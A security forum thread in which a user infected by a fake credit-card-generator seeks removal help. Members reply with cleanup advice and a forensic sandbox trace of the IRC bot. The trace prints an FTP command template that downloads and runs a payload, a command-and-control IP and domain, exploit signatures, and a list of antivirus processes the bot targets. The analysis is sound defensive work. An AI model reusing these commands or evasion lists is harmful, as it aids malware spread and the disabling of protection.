14 replies to this topic

[Freakazoid]

Hi,
I opened a file today, wich couldnt be identified as malware before, because it was cyptet(HEUR I think). It was definitely malware. KAV stopped the file, when it detected it as malware (after i fired up the exe).

After I scanned my System(AV,running processes,...) there was nothing suspicious. I fired uo Rootkit Hook Analyzer and watched the Modules(the scan didnt tell me anything bad). There are 2 Modules I really dont like. Their names change after every Boot of my System. Can you tell me what I can do to get rid of those (without re-setting up the system) or maybe analyze the file?

Modules:


File:
http://rapidshare.co...CC-gen.rar.html

It would be really nice if you guys could help me.

Thanks a lot

BTW: I did not want to do anything bad/any illegal activities with the file.

[Jeffrey]

Yeah, malware writers found out a while back that their malware could be detected by filename, so they started randomly generating them. So if you find a file on your computer, who's name look like a bunch of random junk, chances are that it is malware. However, just because it is a bunch of random junk doesn't necessarily mean that it is malware, so you should just be careful.

I am at work right now, so our anti-virus scanner might through a temper-tantrom if I downloaded them, but I would suggest running them through an online virus scanning site like virustotal or another one like it. One quality that those sites have, is if it doesn't detect it right away, about a week later it will because anything you submit gets analyzed the AV guys to create a signature.

[Freakazoid]

Yeah, thats what I did before.
Here are the results:

Antivirus Version Update Result
AhnLab-V3 2007.5.24.0 05.25.2007 no virus found
AntiVir 7.4.0.27 05.25.2007 HEUR/Crypted
Authentium 4.93.8 05.23.2007 no virus found
Avast 4.7.997.0 05.25.2007 no virus found
AVG 7.5.0.467 05.25.2007 no virus found
BitDefender 7.2 05.25.2007 DeepScan:Generic.Malware.G!SKI!!FLMPWX!!BVPkprng.07034489
CAT-QuickHeal 9.00 05.25.2007 no virus found
ClamAV devel-20070416 05.25.2007 no virus found
DrWeb 4.33 05.25.2007 no virus found
eSafe 7.0.15.0 05.24.2007 no virus found
eTrust-Vet 30.7.3663 05.25.2007 no virus found
Ewido 4.0 05.25.2007 no virus found
FileAdvisor 1 05.25.2007 no virus found
Fortinet 2.85.0.0 05.25.2007 suspicious
F-Prot 4.3.2.48 05.25.2007 no virus found
F-Secure 6.70.13030.0 05.25.2007 no virus found
Ikarus T3.1.1.8 05.25.2007 Backdoor.VB.EV
Kaspersky 4.0.2.24 05.25.2007 no virus found
McAfee 5039 05.25.2007 no virus found

The bad news is, that I couldnt find any removal instuctions/tool to remove the G!SKI!!FLMPWX!!BVPkprng.
I cant even find the Sys-files/they are maybe hidden. What can I do?

Heres something GMER told me:


Thx for your post

[zorin-]

Downloading and running CC generating tools is a really bad thing to do, you do realize that half of these tools are to trick gullible people like you into infecting their machines. I bet none of the tools that promise to do what you wanted to even worked, now I will help you but in future don't do things like this and if you are 'that' tempted run it under a virtual machine...

First step will be to determine what files are infected, from the screenshots you did find out which were the dodgy files but as you said, rebooting the system will make the files randomly change to avoid detection by anti-virus products; you will have to remove the files manually. Seen as they are hidden you can first look to see what files are hidden on your system, run this program called Icesword, I posted in on the forums here: hxxp://www.governmentsecurity.org/forum/index.php?showtopic=24280. Check the processes tab and if you see a hidden process then it will appear red and will be distinct from the other processes, you can terminate the hidden process by right clicking it and selecting the "terminate process". This will have now made sure that the file is not in memory so you *should* be able to delete the files from your system, thing I want to make clear though is only terminate the process if you are 100% sure that the file is malicious, you could quite easily make your system unstable if you screw up.

So if you have done that you will be able to delete the files from your system, if you looked at the path in Icesword you will see the path to the .SYS file/files. They are probably hidden so go to my computer > tools > folder options > view > and then click the option to show hidden files and folders. Now go to the folder where the .SYS files are, make a backup (just incase) and then delete them from your computer system. You might get an error about deleting them so you will have to reboot your computer, press F8 and select to boot into safe mode, then repeat everything I told you, if you are lucky the files will not have been loaded because safe mode will only boot the essential services, try deleting the files and all should be ok. If this does not work try out some anti-virus programs and try to "heal" or put the bad files into the virus vault. There are several good programs from removing rootkit like programs; a good one is F-secures backlight: hxxp://www.f-secure.com/blacklight. There is a free trial so that should do you some favors.

Apart from that there isn't much that I can suggest, you could look for some specialist rootkit removal programs (if the .sys files are for a rootkit) but most of the commercial ones are expensive. Most people would tell you to reformat your computer but only do this if all of your ideas don't work. In the mean time try what I said and tell me if you got any errors when trying to remove the files, I'll see if I can help you clean your system.

[Freakazoid]

Downloading and running CC generating tools is a really bad thing to do, you do realize that half of these tools are to trick gullible people like you into infecting their machines. I bet none of the tools that promise to do what you wanted to even worked, now I will help you but in future don't do things like this and if you are 'that' tempted run it under a virtual machine...

I know, that it was very very stupid, to open that file. Shame on me. Normally, I am the one who tells people not to open (or even download) these files.

First step will be to determine what files are infected, from the screenshots you did find out which were the dodgy files but as you said, rebooting the system will make the files randomly change to avoid detection by anti-virus products; you will have to remove the files manually. Seen as they are hidden you can first look to see what files are hidden on your system, run this program called Icesword, I posted in on the forums here: hxxp://www.governmentsecurity.org/forum/index.php?showtopic=24280. Check the processes tab and if you see a hidden process then it will appear red and will be distinct from the other processes, you can terminate the hidden process by right clicking it and selecting the "terminate process". This will have now made sure that the file is not in memory so you *should* be able to delete the files from your system, thing I want to make clear though is only terminate the process if you are 100% sure that the file is malicious, you could quite easily make your system unstable if you screw up.

I tried IceSword before. It tells me no hidden Process, just the visible ones I know and like. There are no suspicious Ports open, too. But the suspicious Modules are listed in the "Kernel Module"-Tab.

So if you have done that you will be able to delete the files from your system, if you looked at the path in Icesword you will see the path to the .SYS file/files. They are probably hidden so go to my computer > tools > folder options > view > and then click the option to show hidden files and folders. Now go to the folder where the .SYS files are, make a backup (just incase) and then delete them from your computer system. You might get an error about deleting them so you will have to reboot your computer, press F8 and select to boot into safe mode, then repeat everything I told you, if you are lucky the files will not have been loaded because safe mode will only boot the essential services, try deleting the files and all should be ok. If this does not work try out some anti-virus programs and try to "heal" or put the bad files into the virus vault. There are several good programs from removing rootkit like programs; a good one is F-secures backlight: hxxp://www.f-secure.com/blacklight. There is a free trial so that should do you some favors.

Backlight couldnt find any hidden files, too. The processes there are not suspicious. Thanks for the software-tip. I just forgot that prog.

So what else can I do? Ideas? Which sandboxing-tool could you recommend.

Thanks for now. More Replies are welcome .

[Glyph]

Sandboxie..
Primarily for 'sandboxing' Internet Explorer, but you can launch any proggie in the sandboxed environment.
Link: http://www.sandboxie.com/

[Freakazoid]

OK. I ran the malicious Exe in Sandboxie (great program btw) under VMWare (just to be sure ). Sandboxie told me, that the Exe runs a file named plscd.exe. After some googling I found out, that the filename matches RBot. A Rbot removal tool didnt find anything. Sandboxie didnt tell me, that there started anything else, so I do not think, that the random-name modules are there because I clicked the damn file. But where can they come from? Any ideas? Is there an other (non-malicious) Program, that acts like this?

Thanks

[digitalk2003]

This is a fairly nasty bug. I did some forensic analysis on it and here's the information. There was a lot of information available. I'll divide this into two posts. At a high level it is an IRC based malware component that has indications of rootkits.

FYI. TESTBOX (my vmware box) and test (my test acct on my vmware image)

Processes:
PID ParentPID User Path
--------------------------------------------------
656 1916 TESTBOX:test C:\WINDOWS\System32\plscd.exe

--------------------------------------------------
***** Installing Hooks *****
71ab4401 RegOpenKeyExA (HKLM\System\CurrentControlSet\Services\WinSock2\Parameters)
71ab4c59 RegOpenKeyExA (Protocol_Catalog9)
71ab457f RegOpenKeyExA (00000004)
71ab4650 RegOpenKeyExA (Catalog_Entries)
71ab4952 RegOpenKeyExA (000000000001)
71ab4952 RegOpenKeyExA (000000000002)
71ab4952 RegOpenKeyExA (000000000003)
71ab4952 RegOpenKeyExA (000000000004)
71ab4952 RegOpenKeyExA (000000000005)
71ab4952 RegOpenKeyExA (000000000006)
71ab4952 RegOpenKeyExA (000000000007)
71ab4952 RegOpenKeyExA (000000000008)
71ab4952 RegOpenKeyExA (000000000009)
71ab4952 RegOpenKeyExA (000000000010)
71ab4952 RegOpenKeyExA (000000000011)
71ab1779 WaitForSingleObject(7a0,0)
71ab4e6d RegOpenKeyExA (NameSpace_Catalog5)
71ab4797 RegOpenKeyExA (Catalog_Entries)
71ab4efa RegOpenKeyExA (000000000001)
71ab4efa RegOpenKeyExA (000000000002)
71ab4efa RegOpenKeyExA (000000000003)
71ab1779 WaitForSingleObject(798,0)
71aa16bd RegOpenKeyExA (HKLM\System\CurrentControlSet\Services\Winsock2\Parameters)
71aa157c GlobalAlloc()
77e802f3 ExitThread()
6ba087 LoadLibraryA(USER32.dll)=77d40000
6ba091 LoadLibraryA(ADVAPI32.dll)=77dd0000
6ba0a5 LoadLibraryA(NTDLL.dll)=77f50000
6ba48b CreateFileA(\\.\SICE)
6ba614 CreateFileA(\\.\SIWVID)
6ba73d CreateFileA(\\.\NTICE)
6bb29b GetCommandLineA()
6ca24b GetVersionExA()
6c4a8d CreateFileA(C:\WINDOWS\System32\KERNEL32.dll)
6c4ab5 ReadFile()
6c4a8d CreateFileA(C:\WINDOWS\System32\USER32.dll)
6c4a8d CreateFileA(C:\WINDOWS\System32\ADVAPI32.dll)
77e9ba89 GlobalAlloc()
77e9bc6b WaitForSingleObject(7e4,ffffffff)
6cf987 LoadLibraryA(NTDLL)=77f50000
76b42d00 GlobalAlloc()
6cfec3 LoadLibraryA(winmm.dll)=76b40000
6eba26 LoadLibraryA(GDI32.dll)=77c70000
5ad78000 GetCurrentProcessId()=1916
5ad78a58 IsDebuggerPresent()
71d63c RegOpenKeyA (HKLM\SOFTWARE\NuMega\DriverStudio)
77dd5f00 RegOpenKeyExA (HKLM\SOFTWARE\NuMega\DriverStudio)
72217e LoadLibraryA(WS2_32.dll)=71ab0000
72217e LoadLibraryA(KERNEL32.dll)=77e60000
432a7d GetVersionExA()
42ca79 GetCommandLineA()
411224 LoadLibraryA(user32.dll)=77d40000
41173a LoadLibraryA(ws2_32.dll)=71ab0000
411af1 LoadLibraryA(wininet.dll)=76200000
77ddad96 LoadLibraryA(Secur32.dll)=76f90000
76202610 RegOpenKeyExA (HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Cache)
76202610 RegOpenKeyExA (HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache)
762114c7 RegOpenKeyExA (HKLM\System\Setup)
76202610 RegOpenKeyExA (HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders)
76202610 RegOpenKeyExA (HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache)
76202610 RegOpenKeyExA (HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders)
76202682 RegOpenKeyExA (Content)
773fa8aa GetVersionExA()
7621163c LoadLibraryA(shell32.dll)=773d0000
772d203b WaitForSingleObject(63c,0)
76202682 RegOpenKeyExA (Paths)
76202682 RegOpenKeyExA (Path1)
76202682 RegOpenKeyExA (Path2)
76202682 RegOpenKeyExA (Path3)
76202682 RegOpenKeyExA (Path4)
76202682 RegOpenKeyExA (Special Paths)
762118f3 RegSetValueExA (Directory)
76211948 RegSetValueExA (Paths)
762118f3 RegSetValueExA (CachePath)
76211948 RegSetValueExA (CacheLimit)
76202682 RegOpenKeyExA (Cookies)
76202682 RegOpenKeyExA (History)
76201af4 WaitForSingleObject(648,ffffffff)
7621b0b2 CreateFileA(C:\Documents and Settings\test\Local Settings\Temporary Internet Files\Content.IE5\index.dat)
7621abdb CreateFileA(C:\Documents and Settings\test\Local Settings\Temporary Internet Files\Content.IE5\index.dat)
76201af4 WaitForSingleObject(640,ffffffff)
7621b0b2 CreateFileA(C:\Documents and Settings\test\Cookies\index.dat)
7621abdb CreateFileA(C:\Documents and Settings\test\Cookies\index.dat)
76201af4 WaitForSingleObject(630,ffffffff)
7621b0b2 CreateFileA(C:\Documents and Settings\test\Local Settings\History\History.IE5\index.dat)
7621abdb CreateFileA(C:\Documents and Settings\test\Local Settings\History\History.IE5\index.dat)
76202682 RegOpenKeyExA (Extensible Cache)
76203f29 WaitForSingleObject(650,ea60)
76202682 RegOpenKeyExA (MSHist012007052720070528)
772d7aa6 RegOpenKeyExA (HKCU\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings)
76211dec RegOpenKeyExA (HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings)
76211e26 RegOpenKeyExA (HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache)
76212029 CreateMutex((null))
762015d1 WaitForSingleObject(60c,ffffffff)
76212885 LoadLibraryA(wsock32)=71ad0000
76212924 LoadLibraryA(ws2_32)=71ab0000
411c79 LoadLibraryA(icmp.dll)=74290000
76f612d8 GetVersionExA()
76b22d62 GetVersionExA()
76ee198f GlobalAlloc()
76ee1a5b GlobalAlloc()
76ee19e9 CreateMutex(RasPbFile)
76f22edb GetVersionExA()
76f22f6b RegOpenKeyExA (HKLM\System\CurrentControlSet\Services\Tcpip\Parameters)
76d63218 GetVersionExA()
76d63de1 CreateFileA(\\.\Ip)
76d63749 RegOpenKeyExA (HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Linkage)
76d6375f RegOpenKeyExA (HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\)
76d63776 RegOpenKeyExA (HKLM\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\Interfaces)
76d6378d RegOpenKeyExA (HKLM\SYSTEM\CurrentControlSet\Services\NetBT\Parameters)
411d03 LoadLibraryA(netapi32.dll)=71c20000
411e70 LoadLibraryA(dnsapi.dll)=76f20000
411edd LoadLibraryA(iphlpapi.dll)=76d60000
411f49 LoadLibraryA(mpr.dll)=71b20000
411fee LoadLibraryA(shell32.dll)=773d0000
763b184e GetVersionExA()
1f7b1301 RegOpenKeyExA (HKLM\SOFTWARE\Microsoft\MDAC)
1f7b4757 GetVersionExA()
41205c LoadLibraryA(odbc32.dll)=1f7b0000
41213c LoadLibraryA(avicap32.dll)=73b80000
415777 CreateMutex(ids)
41577e WaitForSingleObject(58c,7530)
41592c Copy(C:\malware\r-CC-gen.exe->C:\WINDOWS\System32\plscd.exe)
77e63530 ReadFile()
77e63562 WriteFile(h=588)
412b3a CreateFileA(C:\WINDOWS\explorer.exe)
412b8e CreateFileA(C:\WINDOWS\System32\plscd.exe)
4159e0 GetCurrentProcessId()=1916
4159ee OpenProcess(pid=1916)
415a4f CreateProcessA(C:\WINDOWS\System32\plscd.exe,C:\WINDOWS\System32\plscd.exe 1416 "C:\malware\r-CC-gen.exe",0,C:\WINDOWS\System32)
77e7d0b7 WaitForSingleObject(580,64)
10001e25 LoadLibraryA(psapi.dll)=76bf0000
10001e66 GetCurrentProcessId()=1916
76bf1720 ReadProcessMemory(h=590)
76bf173f ReadProcessMemory(h=590)
76bf175d ReadProcessMemory(h=590)
76bf16af ReadProcessMemory(h=590)

***** OpenProcess Handle=590
***** Remote Allocation base: 140000
***** WriteProcessMemory=1 BufLen=23 BytesWritten:23
***** LoadLibraryA=77e805d8
***** CreateRemoteThread=584
71ab1779 WaitForSingleObject(64,0)
71ab1779 WaitForSingleObject(6c,0)
415a83 ExitProcess()
76ee1b23 GetCommandLineA()
76e911dc GetCommandLineA()
76b2ab1c LoadLibraryA(USER32.dll)=77d40000
5ad79726 GetCurrentProcessId()=1916
***** Injected Process Terminated *****
762015d1 WaitForSingleObject(624,ffffffff)
77e9bc6b WaitForSingleObject(60,ffffffff)
5ad78000 GetCurrentProcessId()=656
432a7e GetVersionExA()
41173b LoadLibraryA(ws2_32.dll)=71ab0000
772d203b WaitForSingleObject(1c8,0)
76201af4 WaitForSingleObject(1bc,ffffffff)
76201af4 WaitForSingleObject(1c4,ffffffff)
76201af4 WaitForSingleObject(1d4,ffffffff)
76203f29 WaitForSingleObject(1b4,ea60)
762015d1 WaitForSingleObject(1f8,ffffffff)
411c7a LoadLibraryA(icmp.dll)=74290000
411f4a LoadLibraryA(mpr.dll)=71b20000
411fef LoadLibraryA(shell32.dll)=773d0000
41213d LoadLibraryA(avicap32.dll)=73b80000
415776 CreateMutex(ids)
41577e WaitForSingleObject(278,7530)
415aaf WaitForSingleObject(588,ffffffff)
40a4f9 RegCreateKeyExA (HKLM\Software\Microsoft\Windows\CurrentVersion\Run,(null))
40a51e RegSetValueExA (DRam prosessor)
40a4f9 RegCreateKeyExA (HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices,(null))
40a4f9 RegCreateKeyExA (HKCU\Software\Microsoft\OLE,(null))
2dc0f1d CreateRemoteThread(h=ffffffff, start=415278)
2dc0f1d CreateRemoteThread(h=ffffffff, start=4226cd)
2dc0f1d CreateRemoteThread(h=ffffffff, start=40a53b)
415da2 InternetGetConnectedState()
76221348 WaitForSingleObject(1ec,ffffffff)
77cd1278 RegOpenKeyExA (HKLM\Software\Microsoft\Rpc)
762039dd WaitForSingleObject(1f0,ffffffff)
421e6c RegOpenKeyExA (HKLM\Software\Microsoft\OLE)
762125b0 GetVersionExA()
77ebb1fa GetCurrentProcessId()=656
421ea7 RegSetValueExA (EnableDCOM)
76212542 GetVersionExA()
421f3f RegOpenKeyExA (HKLM\SYSTEM\CurrentControlSet\Control\Lsa)
7621248b LoadLibraryA(RASAPI32.DLL)=76ee0000
421f6b RegSetValueExA (restrictanonymous)
76e81a66 GlobalAlloc()
76e81b2e RegCreateKeyExA (HKLM\Software\Microsoft\Tracing,(null))
76e81822 RegOpenKeyExA (HKLM\Software\Microsoft\Tracing\RASAPI32)
77ddab13 WaitForSingleObject(2d8,2bf20)
77ddab13 WaitForSingleObject(2e4,2bf20)
76e95b52 GetCurrentProcessId()=656
76f00065 GlobalAlloc()
77ddab13 WaitForSingleObject(2e0,2bf20)
76212608 LoadLibraryA(sensapi.dll)=722b0000
772d7aa6 RegOpenKeyExA (HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings)
762127b3 LoadLibraryA(ntdll.dll)=77f50000
772d7aa6 RegOpenKeyExA (Software\Microsoft\windows\CurrentVersion\Internet Settings)
76ee1e88 LoadLibraryA(SHELL32.dll)=773d0000
75a73b52 GlobalAlloc()
77414b91 LoadLibraryA(USERENV.dll)=75a70000
75a753d4 ReadFile()
772da944 RegCreateKeyExA (Software\Microsoft\windows\CurrentVersion\Internet Settings,)
772da960 RegSetValueExA (MigrateProxy)
76222ab7 RegOpenKeyExA (Software\Microsoft\windows\CurrentVersion\Internet Settings)
76222aff GlobalAlloc()
76222b42 GlobalAlloc()
76222b85 GlobalAlloc()
76212bca WaitForSingleObject(1f4,ffffffff)
762136ef RegCreateKeyExA (Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections,)
76212cd2 GlobalAlloc()
762015d1 WaitForSingleObject(1e0,ffffffff)
76213007 RegCreateKeyExA (Software\Microsoft\windows\CurrentVersion\Internet Settings,)
76213046 RegSetValueExA (ProxyEnable)
7621794f RegDeleteValueA (ProxyServer)
76217962 RegDeleteValueA (ProxyOverride)
762130bc RegDeleteValueA (AutoConfigURL)
772da944 RegCreateKeyExA (HKPD\Software\Microsoft\windows\CurrentVersion\Internet Settings,)
772da960 RegSetValueExA (ProxyEnable)
76213847 WaitForSingleObject(1f4,ffffffff)
76212e16 RegSetValueExA (SavedLegacySettings)
4145a7 gethostbyname(12f3b4)
71ab5475 LoadLibraryA(C:\WINDOWS\System32\mswsock.dll)=71a50000
71a56c07 LoadLibraryA(DNSAPI.dll)=76f20000
71a56ee9 RegOpenKeyExA (HKLM\System\CurrentControlSet\Services\Tcpip\Parameters)
71ab5475 LoadLibraryA(C:\WINDOWS\System32\winrnr.dll)=76fb0000
71ab563c LoadLibraryA(rasadhlp.dll)=76fc0000
415fc5 socket(family=2,type=1,proto=6)
71ab52c6 LoadLibraryA(C:\WINDOWS\system32\mswsock.dll)=71a50000
71a5716a LoadLibraryA(C:\WINDOWS\System32\mswsock.dll)=71a50000
71aa14eb GlobalAlloc()

IRC communications to 415ff5 connect( 216.150.24.22:6667 )
DNS Requests to: us.xnet.org

Malware signatures (within binary) found:
*** Found: Bagle Backdoor Exploitation 1
*** Found: Bagle Backdoor Exploitation 2
*** Found: DameWare Mini Remote Control Buffer Overflow
*** Found: RPC DCOM Exploit MS03-026
*** Found: RPC DCOM Exploit MS03-026
*** Found: LSASS exploit - MS04-011
*** Found: LSASS exploit - MS04-011
*** Found: LSASS exploit - MS04-011
*** Found: MyDoom Backdoor Exploitation
*** Found: Spreads Via Weak Passwords in MSSQL Server
*** Found: NetDevil Exploit
*** Found: Optix Trojan Default Password
*** Found: Sub7 Default Password 1
*** Found: Sub7 Default Password 2
*** Found: IIS 5.0 WebDAV Exploit
Scan Complete: 3368Kb in 0.328 seconds

Urls Found in binary:
http://%s:%s/%s
AmIRC/AmigaOS 2.0.4 by Oliver Wagner <owagner@vapor.com> : http://www.vapor.com/ : [#0000D63F] : The slow mess client
UnPacKcN - http://www.unpack.cn (// custom packer)

RegKey Settings found:
--------------------------------------------------
Software\Valve\CounterStrike\Settings
Software\Eugen Systems\The Gladiators
Software\Valve\Gunman\Settings
Software\Valve\Half-Life\Settings
Software\JoWooD\InstalledGames\IG2
Software\3d0\Status
Software\Silver Style Entertainment\Soldiers Of Anarchy\Settings
Software\Microsoft\Windows\CurrentVersion
Software\Unreal Technology\Installed Apps\UT2003
Software\Unreal Technology\Installed Apps\UT2004
Software\IGI 2 Retail
Software\Electronic Arts\EA Distribution\Freedom Force\ergc
Software\Electronic Arts\EA GAMES\Battlefield 1942\ergc
Software\Electronic Arts\EA GAMES\Battlefield 1942 The Road to Rome\ergc
Software\Electronic Arts\EA GAMES\Battlefield 1942 Secret Weapons of WWII\ergc
Software\Electronic Arts\EA GAMES\Battlefield Vietnam\ergc
Software\Electronic Arts\EA GAMES\Black and White\ergc
Software\Electronic Arts\EA GAMES\Command and Conquer Generals Zero Hour\ergc
Software\Electronic Arts\EA GAMES\James Bond 007 Nightfire\ergc
Software\Electronic Arts\EA GAMES\Generals\ergc
Software\Electronic Arts\EA GAMES\Global Operations\ergc
Software\Electronic Arts\EA GAMES\Medal of Honor Allied Assault\ergc
Software\Electronic Arts\EA GAMES\Medal of Honor Allied Assault Breakthrough\ergc
Software\Electronic Arts\EA GAMES\Medal of Honor Allied Assault Spearhead\ergc
Software\Electronic Arts\EA GAMES\Need For Speed Hot Pursuit 2
Software\Electronic Arts\EA GAMES\Need For Speed Underground\ergc
Software\Electronic Arts\EA GAMES\Shogun Total War - Warlord Edition\ergc
Software\Electronic Arts\EA Sports\FIFA 2002\ergc
Software\Electronic Arts\EA Sports\FIFA 2003\ergc
Software\Electronic Arts\EA Sports\NHL 2002\ergc
Software\Electronic Arts\EA Sports\NHL 2003\ergc
Software\Red Storm Entertainment\RAVENSHIELD
Software\Westwood\Tiberian Sun
Software\Westwood\Red Alert
Software\Westwood\Red Alert 2
Software\Westwood\NOX
Software\Techland\Chrome
Software\Illusion Softworks\Hidden & Dangerous 2
Software\Activision\Soldier of Fortune II - Double Helix
Software\America Online\AOL Instant Messenger ™\CurrentVersion\Login
Software\BioWare\NWN\Neverwinter
Software\BioWare\NWN\Neverwinter
Software\BioWare\NWN\Neverwinter
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\RunServices
Software\Microsoft\OLE
Software\WinLicense

Executable References:

ExeRefs
--------------------------------------------------
File: plscd_dmp.exe_
echo open %s %d > o&echo user 1 1 >> o &echo get bling.exe >> o &echo quit >> o &ftp -n -s:o &bling.exe
echo open %s %d > o&echo user 1 1 >> o &echo get bling.exe >> o &echo quit >> o &ftp -n -s:o &bling.exe
c:\%s.exe
WinXP Professional [universal] lsass.exe
echo open %s %d > o&echo user 1 1 >> o &echo get bling.exe >> o &echo quit >> o &ftp -n -s:o &bling.exe
WinXP Professional [universal] lsass.exe
C:\a.exe
C:\a.exe
explorer.exe
ACKWIN32.EXE
ADAWARE.EXE
ADVXDWIN.EXE
AGENTSVR.EXE
AGENTW.EXE
ALERTSVC.EXE
ALEVIR.EXE
ALOGSERV.EXE
AMON9X.EXE
ANTI-TROJAN.EXE
ANTIVIRUS.EXE
ANTS.EXE
APIMONITOR.EXE
APLICA32.EXE
APVXDWIN.EXE
ARR.EXE
ATCON.EXE
ATGUARD.EXE
ATRO55EN.EXE
ATUPDATER.EXE
ATUPDATER.EXE
ATWATCH.EXE
AU.EXE
AUPDATE.EXE
AUPDATE.EXE
AUTODOWN.EXE
AUTODOWN.EXE
AUTOTRACE.EXE
AUTOTRACE.EXE
AUTOUPDATE.EXE
AUTOUPDATE.EXE
AVCONSOL.EXE
AVE32.EXE
AVGCC32.EXE
AVGCTRL.EXE
AVGNT.EXE
AVGSERV.EXE
AVGSERV9.EXE
AVGUARD.EXE
AVGW.EXE
AVKPOP.EXE
AVKSERV.EXE
AVKSERVICE.EXE
AVKWCTl9.EXE
AVLTMAIN.EXE
AVNT.EXE
AVP.EXE
AVP32.EXE
AVPCC.EXE
AVPDOS32.EXE
AVPM.EXE
AVPTC32.EXE
AVPUPD.EXE
AVPUPD.EXE
AVSCHED32.EXE
AVSYNMGR.EXE
AVWIN95.EXE
AVWINNT.EXE
AVWUPD.EXE
AVWUPD32.EXE
AVWUPD32.EXE
AVWUPSRV.EXE
AVXMONITOR9X.EXE
AVXMONITORNT.EXE
AVXQUAR.EXE
AVXQUAR.EXE
BACKWEB.EXE
BARGAINS.EXE
BD_PROFESSIONAL.EXE
BEAGLE.EXE
BELT.EXE
BIDEF.EXE
BIDSERVER.EXE
BIPCP.EXE
BIPCPEVALSETUP.EXE
BISP.EXE
BLACKD.EXE
BLACKICE.EXE
BLSS.EXE
BOOTCONF.EXE
BOOTWARN.EXE
BORG2.EXE
BPC.EXE
BRASIL.EXE
BS120.EXE
BUNDLE.EXE
BVT.EXE
CCAPP.EXE
CCEVTMGR.EXE
CCPXYSVC.EXE
CDP.EXE
CFD.EXE
CFGWIZ.EXE
CFIADMIN.EXE
CFIAUDIT.EXE
CFIAUDIT.EXE
CFINET.EXE
CFINET32.EXE
CLAW95CF.EXE
CLEAN.EXE
CLEANER.EXE
CLEANER3.EXE
CLEANPC.EXE
CLICK.EXE
CMD32.EXE
CMESYS.EXE
CMGRDIAN.EXE
CMON016.EXE
CONNECTIONMONITOR.EXE
CPD.EXE
CPF9X206.EXE
CPFNT206.EXE
CTRL.EXE
CV.EXE
CWNB181.EXE
CWNTDWMO.EXE
Claw95.EXE
CLAW95CF.EXE
DATEMANAGER.EXE
DCOMX.EXE
DEFALERT.EXE
DEFSCANGUI.EXE
DEFWATCH.EXE
DEPUTY.EXE
DIVX.EXE
DLLCACHE.EXE
DLLREG.EXE
DOORS.EXE
DPF.EXE
DPFSETUP.EXE
DPPS2.EXE
DRWATSON.EXE
DRWEB32.EXE
DRWEBUPW.EXE
DSSAGENT.EXE
DVP95.EXE
DVP95_0.EXE
ECENGINE.EXE
EFPEADM.EXE
EMSW.EXE
ENT.EXE
ESAFE.EXE
ESCANH95.EXE
ESCANHNT.EXE
ESCANV95.EXE
ESPWATCH.EXE
ETHEREAL.EXE
ETRUSTCIPE.EXE
EVPN.EXE
EXANTIVIRUS-CNET.EXE
EXE.AVXW.EXE
EXPERT.EXE
EXPLORE.EXE
F-AGNT95.EXE
F-PROT.EXE
F-PROT95.EXE
F-STOPW.EXE
FAMEH32.EXE
FAST.EXE
FCH32.EXE
FIH32.EXE
FINDVIRU.EXE
FIREWALL.EXE
FLOWPROTECTOR.EXE
FNRB32.EXE
FP-WIN.EXE
FP-WIN_TRIAL.EXE
FPROT.EXE
FRW.EXE
FSAA.EXE
FSAV.EXE
FSAV32.EXE
FSAV530STBYB.EXE
FSAV530WTBYB.EXE
FSAV95.EXE
FSGK32.EXE
FSM32.EXE
FSMA32.EXE
FSMB32.EXE
GATOR.EXE
GBMENU.EXE
GBPOLL.EXE
GENERICS.EXE
GMT.EXE
GUARD.EXE
GUARDDOG.EXE
HACKTRACERSETUP.EXE
HBINST.EXE
HBSRV.EXE
HOTACTIO.EXE
HOTPATCH.EXE
HTLOG.EXE
HTPATCH.EXE
HWPE.EXE
HXDL.EXE
HXIUL.EXE
IAMAPP.EXE
IAMSERV.EXE
IAMSTATS.EXE
IBMASN.EXE
IBMAVSP.EXE
ICLOAD95.EXE
ICLOADNT.EXE
ICMON.EXE
ICSUPP95.EXE
ICSUPP95.EXE
ICSUPPNT.EXE
IDLE.EXE
IEDLL.EXE
IEDRIVER.EXE
IEXPLORER.EXE
IFACE.EXE
IFW2000.EXE
INETLNFO.EXE
INFUS.EXE
INFWIN.EXE
INIT.EXE
INTDEL.EXE
INTREN.EXE
IOMON98.EXE
IPARMOR.EXE
IRIS.EXE
ISASS.EXE
ISRV95.EXE
ISTSVC.EXE
JAMMER.EXE
JDBGMRG.EXE
JEDI.EXE
KAVLITE40ENG.EXE
KAVPERS40ENG.EXE
KAVPF.EXE
KAZZA.EXE
KEENVALUE.EXE
KERIO-PF-213-EN-WIN.EXE
KERIO-WRL-421-EN-WIN.EXE
KERIO-WRP-421-EN-WIN.EXE
KERNEL32.EXE
KILLPROCESSSETUP161.EXE
LAUNCHER.EXE
LDNETMON.EXE
LDPRO.EXE
LDPROMENU.EXE
LDSCAN.EXE
LNETINFO.EXE
LOADER.EXE
LOCALNET.EXE
LOCKDOWN.EXE
LOCKDOWN2000.EXE
LOOKOUT.EXE
LORDPE.EXE
LSETUP.EXE
LUALL.EXE
LUALL.EXE
LUAU.EXE
LUCOMSERVER.EXE
LUINIT.EXE
LUSPT.EXE
MAPISVC32.EXE
MCAGENT.EXE
MCMNHDLR.EXE
MCSHIELD.EXE
MCTOOL.EXE
MCUPDATE.EXE
MCUPDATE.EXE
MCVSRTE.EXE
MCVSSHLD.EXE
MD.EXE
MFIN32.EXE
MFW2EN.EXE
MFWENG3.02D30.EXE
MGAVRTCL.EXE
MGAVRTE.EXE
MGHTML.EXE
MGUI.EXE
MINILOG.EXE
MMOD.EXE
MONITOR.EXE
MOOLIVE.EXE
MOSTAT.EXE
MPFAGENT.EXE
MPFSERVICE.EXE
MPFTRAY.EXE
MRFLUX.EXE
MSAPP.EXE
MSBB.EXE
MSBLAST.EXE
MSCACHE.EXE
